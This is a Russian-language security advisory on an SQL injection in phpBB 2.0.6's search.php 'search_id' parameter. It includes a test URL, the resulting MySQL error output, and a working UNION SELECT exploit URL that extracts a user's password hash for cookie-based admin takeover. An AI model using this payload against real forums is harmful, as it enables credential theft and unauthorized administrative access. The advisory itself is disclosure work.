Программа: phpBB 2.06 и более ранние версии 

Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению.
Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. 

Для определения уязвимости, выполните следующий запрос: 

http://your_site/phpBB2/search.php?search_id=1\

Если ваша система уязвима, то запрос выдаст SQL ошибку: 

SQL Error : 1064 You have an error in your SQL syntax. Check the manual
that corresponds to your MySQL server version for the right syntax to use near '\\ AND
session_id = '9c9052fd135c0cefb31ec4b5124060f7''

SELECT search_array FROM phpbb_search_results WHERE search_id = 1\\ AND session_id=
'9c9052fd135c0cefb31ec4b5124060f7'

Line : 693
File : /usr/local/www/data/phpBB2/search.php

Эксплоит (работает только в MySQL 4.x!): 

http://site.com/search.php?search_id=
1%20union%20select%20concat( char (
97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99, 104,95,114,101,115,117,108,116
,115,34, 59,115,58,49,58,34,49,34,59,115, 58,49,55,58,34,116,111,116,97,108, 95,109,97,
116,99,104,95,99,111,117,110,116,34, 59,105,58,53,59,115,58,49,50,58,34,115,112,108,
105,116,95,115,101,97, 114,99,104,34,59,97,58, 49,58,123,105,58,48,59,115,
58,51,50,58, 34),user_password,char(34,59,125,115,58,55,58,34,115,111,
114,116,95,98,121,34,59,105, 58,48,59,115,58,56,
58,34,115,111,114,116,95,100,105, 114,34,59,115,58,52,58,34,68,69,
83,67,34,59,115,58,49,50,58,34,115,104, 111,119,95,114,101,115,117,108,116,
115,34,59, 115,58,54,58,34,116,111, 112,105,99,115,34,59,115,58,49,
50,58,34,114,101,116,117,114, 110,95,99,104,97,114,115,
34,59,105,58,50,48,48,59,125)) %20 from%20phpbb_users%20where%20user_id=[id]/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии